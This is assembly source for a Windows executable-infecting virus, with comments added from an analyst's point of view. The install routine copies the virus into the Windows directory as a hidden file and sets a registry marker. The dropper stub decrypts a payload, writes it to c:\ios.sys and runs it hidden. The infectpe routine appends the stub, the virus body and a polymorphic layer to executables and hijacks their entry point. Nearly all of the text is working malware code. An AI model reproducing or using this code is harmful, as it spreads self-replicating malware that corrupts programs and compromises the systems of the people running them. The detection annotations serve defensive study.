        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi
        inc     eax

        inc     ebp
        cmp     ebp,24
        ja      addEndOfLine
        inc     ebp

addedEndOfLine:
        sub     ecx,3
        or      ecx,ecx
        jnz     baseLoop

        mov     ecx,esi
        add     edx,esi
        pop     ebp
        ret

addEndOfLine:
        xor     ebp,ebp
        mov     word [edx+esi],0a0dh
        add     esi,2
        jmp     addedEndOfLine

; - auxf.inc EOF -
; - install.inc BOF -

[extern GetWindowsDirectoryA]
[extern lstrcat]
[extern RegOpenKeyExA]
[extern RegQueryValueExA]
[extern RegSetValueExA]
[extern RegCloseKey]
[extern CreateFileA]
[extern WriteFile]
[extern CloseHandle]
[extern GetVolumeInformationA]

;-----------------------------------------------------------------------
; install  --  write the in-memory image (memory/vsize) into the Windows
;              directory and record an "already installed" marker value
;              in the registry.  (Analyst annotation, defender's view.)
; ABI:   internal routine, not C-callable.  Builds a 260-byte path
;        buffer on the stack; ebp points at it for the whole routine.
; In:    globals drive, regKey, regName, iname, memory, vsize, hkey,
;        localtime (all defined outside this block); rnd is external.
; Out:   CF = 0 on success (installOK), CF = 1 on failure (installKO);
;        al is clobbered, other registers per the Win32 calls made.
; Artifacts observable on disk / in the registry:
;   - file <WindowsDir> + iname, created hidden + read-only, holding
;     vsize bytes copied from [memory]
;   - HKLM\<regKey>\<regName> (REG_SZ) = that file's path, where the
;     value name is four lowercase letters derived from the volume
;     serial number of `drive`
;-----------------------------------------------------------------------
install:
        push    ebp
        mov     ebp,esp
        sub     esp,260                 ; 260-byte path buffer
        push    ebp                     ; saved frame pointer, restored before leave
        sub     ebp,260                 ; ebp = start of the buffer

        xor     eax,eax
        push    eax                     ; nFileSystemNameSize = 0
        push    eax                     ; lpFileSystemNameBuffer = NULL
        push    eax                     ; lpFileSystemFlags = NULL
        push    eax                     ; lpMaxComponentLength = NULL
        push    dword regName           ; lpVolumeSerialNumber -> regName
        push    eax                     ; nVolumeNameSize = 0
        push    eax                     ; lpVolumeNameBuffer = NULL
        push    dword drive             ; lpRootPathName
        call    GetVolumeInformationA
        or      eax,eax
        jz      near installKO

        ; Map the 32-bit serial to four printable lowercase letters:
        ; keep the low nibble of each byte and OR in 'a','b','c','d'
        ; (results fall in 'a'..'o').  This is the registry value name.
        and     dword [regName],0f0f0f0fh
        or      dword [regName],"abcd"

        push    dword 20h
        call    rnd                     ; rnd(20h): defined elsewhere
        or      eax,eax                 ; a zero result skips installation
        jz      near installOK          ; (still reported as success, CF = 0)

        push    dword hkey              ; phkResult
        push    dword KEY_ALL_ACCESS
        push    dword 0                 ; ulOptions
        push    dword regKey            ; lpSubKey
        push    dword HKEY_LOCAL_MACHINE
        call    RegOpenKeyExA
        or      eax,eax                 ; ERROR_SUCCESS == 0
        jnz     near installKO

        ; Marker check: if the value already exists the machine is
        ; already installed -> bail out (eax is 0 here, reused as NULL).
        push    eax                     ; lpcbData = NULL
        push    eax                     ; lpData = NULL
        push    dword localtime         ; lpType (scratch dword)
        push    eax                     ; lpReserved
        push    dword regName           ; lpValueName
        push    dword [hkey]
        call    RegQueryValueExA
        or      eax,eax
        jz      near installKO          ; value present -> do not reinstall

        push    dword 260               ; uSize
        push    ebp                     ; lpBuffer
        call    GetWindowsDirectoryA
        or      eax,eax
        jz      near installKO

        push    dword iname
        push    ebp
        call    lstrcat                 ; buffer = WindowsDir + iname

        push    dword 0                 ; hTemplateFile
        push    dword 3                 ; FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_HIDDEN
        push    dword 2                 ; CREATE_ALWAYS
        push    dword 0                 ; lpSecurityAttributes
        push    dword 0                 ; dwShareMode
        push    dword 40000000h         ; GENERIC_WRITE
        push    ebp                     ; lpFileName
        call    CreateFileA
        inc     eax                     ; INVALID_HANDLE_VALUE (-1) -> 0
        jz      installKO
        dec     eax

        push    eax                     ; handle parked on the stack for CloseHandle below
        push    dword 0                 ; lpOverlapped
        push    dword localtime         ; lpNumberOfBytesWritten (scratch)
        push    dword [vsize]           ; nNumberOfBytesToWrite
        push    dword [memory]          ; lpBuffer
        push    eax                     ; hFile
        call    WriteFile

        call    CloseHandle             ; consumes the handle pushed above

        push    dword 260               ; cbData
        push    ebp                     ; lpData = path of the written file
        push    dword REG_SZ
        push    dword 0                 ; Reserved
        push    dword regName           ; lpValueName
        push    dword [hkey]
        call    RegSetValueExA          ; marker value = path

        push    dword [hkey]
        call    RegCloseKey

installOK:
        clc                             ; success: CF = 0
        mov     al,0f9h                 ; encodes as B0 F9; the F9 byte on its own is `stc`
installKO       equ $-1                 ; so a jump to installKO executes `stc`: CF = 1
        pop     ebp
        leave
        ret

; - install.inc EOF -
; - dropit.inc BOF -

; Hard-coded Win9x kernel32.dll image base.  k32Tip and execIt read PE
; structures at this address directly, so the dropper stub depends on
; kernel32 being mapped exactly here; dropBegin guards on the top byte
; of the loader's return address before relying on it.
KERNEL32        equ     0bff70000h

;-----------------------------------------------------------------------
; dropBegin  --  stub placed at an infected host's new entry point.
; Pushes the original host entry point (patched into hostEP by infectpe)
; so that the final `ret` resumes the host.  On Win9x only (detected via
; the return address' top byte) it locates kernel32 at the fixed base,
; decrypts the appended payload, writes it to disk and executes it.
; Everything from dropBegin up to data2drop (dropperSize bytes) is copied
; verbatim into hosts, so all label references go through getDelta.
;-----------------------------------------------------------------------
dropBegin:
        push    dword 12345678h         ; placeholder; infectpe writes the host EP here
hostEP  equ     $-4
        pushad

        ; After the push and pushad, [esp+24h] is the dword that was at
        ; [esp] on entry (presumably the loader's return address); its
        ; top byte is 0BFh when it lies in the KERNEL32 range.
        cmp     byte [esp+27h],0bfh
        jne     near notWin9x

        call    k32Tip                  ; eax = RVA of kernel32 AddressOfFunctions, edi = KERNEL32
        mov     eax,dword [eax+edi]     ; AddressOfFunctions[0]
        add     eax,edi

        mov     ebp,eax                 ; ebp = that export; int21h calls through it

        call    decryptIt               ; decode the payload in place

        call    dropIt                  ; write it to file2drop

        call    execIt                  ; WinExec it
notWin9x:
        popad
        ret                             ; -> original host entry point

;-----------------------------------------------------------------------
; dropIt  --  write the decoded payload (data2drop, [dropSize] bytes) to
; the fixed path in file2drop using DOS int 21h functions issued via
; int21h (create 3Ch / write 40h / close 3Eh).
; In:    ebp = dispatcher used by int21h (set up in dropBegin).
; Out:   returns early if the create fails (CF set by the call).
; Clobbers eax, ebx, ecx, edx.
; Artifact: the file c:\ios.sys (see file2drop), created read-only+hidden.
;-----------------------------------------------------------------------
dropIt:
        mov     ecx,3                   ; cx = attributes: read-only | hidden
        mov     ah,byte 3ch             ; int 21h/3Ch: create file
        call    getDelta
        add     edx,file2drop           ; edx -> ASCIIZ path
        call    int21h
        jnc     openok
        ret                             ; create failed
openok:
        xchg    eax,ebx                 ; bx = file handle

        mov     ah,40h                  ; int 21h/40h: write
        mov     ecx,12345678h           ; byte count; presumably patched elsewhere via dropSize
dropSize        equ $-4
        call    getDelta
        add     edx,data2drop           ; edx -> payload
        call    int21h

        mov     ah,3eh                  ; int 21h/3Eh: close
        call    int21h
        ret

;-----------------------------------------------------------------------
; execIt  --  resolve WinExec by name from the kernel32 export table at
; the fixed KERNEL32 base (name pointer table -> ordinal table ->
; address table) and call WinExec(file2drop, 0).
; In:    nothing; relocation via getDelta.  Clobbers eax-edx, esi, edi, ebp.
; Detection note: the string "WinExec" and the path in file2drop are
; stored in clear text inside the stub.
;-----------------------------------------------------------------------
execIt:
        call    getDelta
        mov     ebp,edx                 ; ebp = relocation delta
        call    k32Tip                  ; eax = AddressOfFunctions RVA, esi -> AddressOfNames
        add     eax,edi
        mov     dword [address+ebp],eax ; VA of export address table
        lodsd
        add     eax,edi
        mov     dword [names+ebp],eax   ; VA of name pointer table
        lodsd
        add     eax,edi
        mov     dword [ordinals+ebp],eax ; VA of name-ordinal table

        xor     edx,edx                 ; edx = byte offset into the name table (index*4)
        lea     esi,[winexecsz+ebp]
        mov     ecx,winexeclen
searchl:
        push    ecx
        push    esi
        mov     edi,dword [names+ebp]
        add     edi,edx
        mov     edi,dword [edi]         ; RVA of this export's name
        add     edi,KERNEL32
        rep     cmpsb                   ; compare winexeclen bytes against "WinExec"
        je      fFound
        add     edx,4
        pop     esi
        pop     ecx
        jmp     searchl                 ; no bound: loops until a match is found
fFound:
        pop     esi
        pop     ecx
        shr     edx,1                   ; index*4 -> index*2 (word-sized ordinal table)
        add     edx,dword [ordinals+ebp]
        movzx   ebx,word [edx]          ; ordinal index
        shl     ebx,2
        add     ebx,dword [address+ebp]
        mov     ecx,dword [ebx]
        add     ecx,KERNEL32            ; ecx = WinExec

        push    dword 0                 ; uCmdShow = 0 (SW_HIDE)
        lea     esi,[file2drop+ebp]
        push    esi                     ; lpCmdLine = dropped file path
        call    ecx
        ret

;-----------------------------------------------------------------------
; getDelta  --  call/pop relocation: edx = (runtime address of delta)
; - (assembled address of delta), the value to add to any label in the
; stub when it runs at a different address inside an infected host.
; Out:   edx = delta.  Nothing else is touched.  The `ret` in delta
;        returns to getDelta's caller because the inner return address
;        has already been popped.
;-----------------------------------------------------------------------
getDelta:
        call    delta
delta:
        pop     edx
        sub     edx,dword delta
        ret
;-----------------------------------------------------------------------
; int21h  --  issue a DOS int 21h request from Win32 code by calling the
; kernel32 export in ebp with (002a0010h, eax, ecx) as arguments.
; NOTE(review): 002a0010h looks like the VWIN32 (device 2Ah) Int21
; dispatch service; inferred from the constant, not stated on the page.
; In:    ebp = dispatcher (set in dropBegin); eax/ecx = int 21h regs.
; Out:   whatever the dispatcher returns (callers test CF / eax).
;-----------------------------------------------------------------------
int21h:
        push    ecx
        push    eax
        push    dword 002a0010h
        call    ebp
        ret

;-----------------------------------------------------------------------
; decryptIt  --  decode the [dropSize]-byte payload at data2drop in
; place: each byte is XORed with a running key byte (starting at cKey,
; incremented per byte, wrapping at 256) and then bit-inverted.
; Clobbers eax, ecx, edx.  cKey and dropSize are presumably patched by
; the infector (not visible on this page).
;-----------------------------------------------------------------------
decryptIt:
        call    getDelta
        mov     ecx,[dropSize+edx]      ; byte count
        add     edx,data2drop           ; edx -> payload
        xor     eax,eax
        mov     al,0ffh                 ; initial key byte (the F9 after B0 is cKey)
cKey    equ     $-1
decryptItLoop:
        xor     byte [edx],al
        not     byte [edx]
        inc     edx
        inc     ax                      ; only al is used: key = (cKey + i) & 0FFh
        loop    decryptItLoop
        ret

;-----------------------------------------------------------------------
; k32Tip  --  walk the kernel32 PE headers at the fixed KERNEL32 base:
; e_lfanew -> PE header -> export directory RVA (DataDirectory[0] at
; PE+78h) -> the AddressOfFunctions field (export dir + 1Ch).
; Out:   eax = AddressOfFunctions (RVA), edi = KERNEL32,
;        esi -> the following field (AddressOfNames), so callers can
;        keep using lodsd.
; Only meaningful where kernel32 is loaded exactly at KERNEL32.
;-----------------------------------------------------------------------
k32Tip:
        mov     edi,KERNEL32
        mov     esi,KERNEL32+3ch        ; &e_lfanew
        lodsd
        add     eax,edi                 ; eax = PE header VA
        xchg    eax,esi
        mov     esi,dword [esi+78h]     ; export directory RVA
        add     esi,dword 1ch+KERNEL32  ; -> AddressOfFunctions
        lodsd
        ret

; Data carried inside the dropper stub (copied into every host together
; with the code above).  The clear-text strings below are static IoCs.
winexecsz       db      "WinExec"       ; export name looked up by execIt
winexeclen      equ     $-winexecsz
address         dd      0               ; scratch: export address table VA
names           dd      0               ; scratch: name pointer table VA
ordinals        dd      0               ; scratch: ordinal table VA
file2drop       db      'c:\ios.sys',0  ; drop path used by dropIt / execIt
dropperSize     equ $-dropBegin         ; bytes of stub copied per infection
data2drop:                              ; payload decoded by decryptIt starts here

; - dropit.inc EOF -

; - infectpe.inc BOF -

[extern CreateFileA]
[extern CloseHandle]
[extern GetFileAttributesA]
[extern SetFileAttributesA]
[extern GetFileSize]
[extern GetFileTime]
[extern SetFileTime]
[extern CreateFileMappingA]
[extern MapViewOfFile]
[extern UnmapViewOfFile]

; Granularity to which infectpe rounds up the new file size (see the
; [padding] computation): an infected file's length is always a
; multiple of 101 bytes -- a cheap detection heuristic.
PADDING equ     101

;-----------------------------------------------------------------------
; infectpe  --  append the dropper stub + body + polymorphic layer to
; the last section of a PE executable and redirect its entry point.
; (Analyst annotation, defender's view.)
; In:    esi -> ASCIIZ path of the target file.
; Out:   nothing meaningful; every failure path falls through the error
;        labels at the end, which unmap/close whatever was set up and
;        restore the original timestamps and attributes.
; Uses globals: fileAttrib, fHnd, fileSize, fileTime0..2, fhmap, mapMem,
;        crptBegin, hostEP, poly, polySize, padding, memory, vsize;
;        calls genPolyData (defined below).
; Targets accepted: MZ/PE image, IMAGE_FILE_EXECUTABLE_IMAGE set, not a
;        DLL, Subsystem != 1 (native), non-zero low word of SizeOfCode,
;        and last section ending exactly at end of file.
; Artifacts left on an infected file (useful for detection):
;   - AddressOfEntryPoint moved to the old end of the last section
;   - last section Characteristics gain MEM_READ | MEM_WRITE
;   - OptionalHeader.CheckSum zeroed
;   - file length rounded up to a multiple of PADDING (101)
;   - original file times and attributes restored after writing
;-----------------------------------------------------------------------
infectpe:
        push    esi

        push    esi
        call    GetFileAttributesA
        pop     esi
        inc     eax                     ; -1 (INVALID_FILE_ATTRIBUTES) -> 0
        jz      near infectionError
        dec     eax

        mov     dword [fileAttrib],eax  ; kept so they can be restored on exit

        push    esi
        push    dword 80h               ; FILE_ATTRIBUTE_NORMAL (drops read-only etc.)
        push    esi
        call    SetFileAttributesA
        pop     esi
        or      eax,eax
        jz      near infectionError

        push    esi

        push    dword 0                 ; hTemplateFile
        push    dword 80h               ; FILE_ATTRIBUTE_NORMAL
        push    dword 3                 ; OPEN_EXISTING
        push    dword 0                 ; lpSecurityAttributes
        push    dword 0                 ; dwShareMode (exclusive)
        push    dword (80000000h | 40000000h) ; GENERIC_READ | GENERIC_WRITE
        push    esi
        call    CreateFileA
        inc     eax                     ; INVALID_HANDLE_VALUE (-1) -> 0
        jz      near infectionErrorAttrib
        dec     eax

        mov     [fHnd],eax

        push    dword 0                 ; lpFileSizeHigh = NULL
        push    eax
        call    GetFileSize
        inc     eax                     ; INVALID_FILE_SIZE (-1) -> 0
        jz      near infectionErrorClose
        dec     eax

        mov     [fileSize],eax

        push    dword fileTime2         ; lpLastWriteTime
        push    dword fileTime1         ; lpLastAccessTime
        push    dword fileTime0         ; lpCreationTime
        push    dword [fHnd]
        call    GetFileTime             ; saved to put the timestamps back afterwards
        or      eax,eax
        jz      near infectionErrorClose

        xor     eax,eax
        push    eax                     ; lpName = NULL
        push    eax                     ; dwMaximumSizeLow = 0 (current size)
        push    eax                     ; dwMaximumSizeHigh = 0
        push    dword 4                 ; PAGE_READWRITE
        push    eax                     ; lpAttributes = NULL
        push    dword [fHnd]
        call    CreateFileMappingA
        or      eax,eax
        jz      near infectionErrorClose

        mov     dword [fhmap],eax

        xor     eax,eax
        push    eax                     ; dwNumberOfBytesToMap = 0 (whole file)
        push    eax                     ; dwFileOffsetLow
        push    eax                     ; dwFileOffsetHigh
        push    dword 6                 ; FILE_MAP_WRITE | FILE_MAP_READ
        push    dword [fhmap]
        call    MapViewOfFile
        or      eax,eax
        jz      near infectionErrorCloseMap

        mov     [mapMem],eax

        ; --- header sanity checks (eax = view base) ---
        mov     edi,eax
        cmp     word [edi],'MZ'
        jne     near infectionErrorCloseUnmap

        add     edi,[edi+3ch]           ; edi = PE header (base + e_lfanew)
        cmp     eax,edi
        jae     near infectionErrorCloseUnmap   ; e_lfanew is zero or wrapped
        add     eax,[fileSize]
        cmp     eax,edi
        jbe     near infectionErrorCloseUnmap   ; PE header lies beyond EOF
        cmp     word [edi],'PE'
        jne     near infectionErrorCloseUnmap

        movzx   edx,word [edi+16h]      ; FileHeader.Characteristics
        test    edx,2h                  ; IMAGE_FILE_EXECUTABLE_IMAGE must be set
        jz      near infectionErrorCloseUnmap
        and     edx,2000h               ; IMAGE_FILE_DLL -> skip (edx is 0 afterwards)
        jnz     near infectionErrorCloseUnmap
        mov     dx,[edi+5ch]            ; OptionalHeader.Subsystem
        dec     edx
        jz      near infectionErrorCloseUnmap   ; 1 (native) -> skip

        cmp     word [edi+1ch],0        ; low word of OptionalHeader.SizeOfCode
        je      near infectionErrorCloseUnmap

        ; --- locate the last section header ---
        mov     esi,edi                 ; esi = PE header
        mov     eax,18h                 ; sizeof(signature + FileHeader)
        add     ax,[edi+14h]            ; + SizeOfOptionalHeader
        add     edi,eax                 ; edi = first section header

        mov     cx,[esi+06h]            ; NumberOfSections
        dec     cx
        mov     eax,28h                 ; sizeof(IMAGE_SECTION_HEADER)
        mul     cx
        add     edi,eax                 ; edi = last section header

        mov     ecx,[edi+14h]           ; PointerToRawData
        add     ecx,[edi+10h]           ; + SizeOfRawData

        cmp     ecx,[fileSize]          ; only if the last section ends exactly at EOF
        jne     near infectionErrorCloseUnmap

        ; --- new entry point and the VA where the appended code lands ---
        mov     eax,[edi+0ch]           ; last section VirtualAddress
        add     eax,[edi+10h]           ; + SizeOfRawData = RVA of the appended code
        mov     [crptBegin],eax
        xchg    eax,[esi+28h]           ; AddressOfEntryPoint := that RVA; eax = old EP RVA
        mov     ecx,[esi+34h]           ; ImageBase
        add     [crptBegin],ecx
        add     dword [crptBegin],5     ; VA just after the 5-byte `call` emitted below
        add     eax,ecx
        mov     [hostEP],eax            ; old entry point VA, patched into the stub

        ; --- build the block to append in the poly buffer ---
        pushad
        mov     edi,[poly]
        mov     al,0e8h                 ; `call rel32` ...
        stosb
        xor     eax,eax
        add     eax,dropperSize
        add     eax,[vsize]
        stosd                           ; ... whose target is past stub + body
        lea     esi,[dropBegin]
        mov     ecx,dropperSize
        rep     movsb                   ; copy the dropper stub

        mov     esi,[memory]
        mov     ecx,[vsize]
        rep     movsb                   ; copy vsize bytes from [memory]

        mov     esi,[crptBegin]
        call    genPolyData             ; emits the polymorphic layer; ecx = its size
        mov     [polySize],ecx
        popad

        xor     eax,eax
        mov     [esi+58h],eax           ; OptionalHeader.CheckSum = 0

        or      dword [edi+24h],0c0000000h      ; last section Characteristics |= MEM_WRITE | MEM_READ

        ; --- grow SizeOfRawData: (q+1)*FileAlignment ---
        mov     eax,dropperSize+5
        add     eax,[vsize]
        add     eax,[polySize]          ; eax = total bytes appended
        push    eax
        add     eax,[edi+10h]
        mov     ecx,[esi+3ch]           ; FileAlignment
        xor     edx,edx
        div     ecx
        inc     eax
        mul     ecx
        mov     [edi+10h],eax           ; new SizeOfRawData

        ; --- SizeOfImage and VirtualSize: (q+1)*SectionAlignment ---
        add     eax,[edi+0ch]
        mov     ecx,[esi+38h]           ; SectionAlignment
        xor     edx,edx
        div     ecx
        inc     eax
        mul     ecx
        mov     [esi+50h],eax           ; OptionalHeader.SizeOfImage
        sub     eax,[edi+0ch]
        mov     [edi+08h],eax           ; last section VirtualSize

        ; --- new file length: (old size + appended) rounded up to PADDING ---
        pop     eax
        add     eax,[fileSize]
        mov     ecx,PADDING
        xor     edx,edx
        div     ecx
        inc     eax
        mul     ecx
        mov     [padding],eax

        push    dword [mapMem]
        call    UnmapViewOfFile

        push    dword [fhmap]
        call    CloseHandle

        ; --- re-map at the enlarged size and write the appended block ---
        xor     eax,eax
        push    eax                     ; lpName = NULL
        push    dword [padding]         ; dwMaximumSizeLow = new file length
        push    eax                     ; dwMaximumSizeHigh
        push    dword 4                 ; PAGE_READWRITE
        push    eax                     ; lpAttributes
        push    dword [fHnd]
        call    CreateFileMappingA
        or      eax,eax
        jz      infectionErrorClose

        mov     [fhmap],eax

        xor     eax,eax
        push    dword [padding]         ; dwNumberOfBytesToMap
        push    eax                     ; dwFileOffsetLow
        push    eax                     ; dwFileOffsetHigh
        push    dword 6                 ; FILE_MAP_WRITE | FILE_MAP_READ
        push    dword [fhmap]
        call    MapViewOfFile
        or      eax,eax
        jz      infectionErrorCloseMap

        mov     [mapMem],eax

        mov     ecx,dropperSize+5
        add     ecx,[vsize]
        add     ecx,[polySize]          ; bytes to append
        mov     esi,[poly]
        mov     edi,eax
        add     edi,dword [fileSize]    ; destination = old end of file
        rep     movsb

        ; --- cleanup chain; the error labels fall through each other ---
infectionErrorCloseUnmap:
        push    dword [mapMem]
        call    UnmapViewOfFile

infectionErrorCloseMap:
        push    dword [fhmap]
        call    CloseHandle

        push    dword fileTime2
        push    dword fileTime1
        push    dword fileTime0
        push    dword [fHnd]
        call    SetFileTime             ; put the original timestamps back

infectionErrorClose:
        push    dword [fHnd]
        call    CloseHandle

infectionErrorAttrib:
        pop     esi
        push    dword [fileAttrib]
        push    esi
        call    SetFileAttributesA      ; put the original attributes back

infectionError:
        ret

genPolyData:
        push    dword MAXLAYER/2
        call    rnd
        add     eax,MAXLAYER/2

        mov     [lCnt],eax
        mov     ecx,eax

        push    edi
genPolyDataL:
        push    esi
        push    ecx
        push    edi
        mov     ecx,dropperSize
        add     ecx,[vsize]
        call    brepoge
        pop     edi
        add     edi,ecx

        pop     ecx

        mov     eax,[vKey]
        mov     [kStack-4+ecx*4],eax
        mov     eax,[mKey]
        mov     [mStack-4+ecx*4],eax

        pop     esi
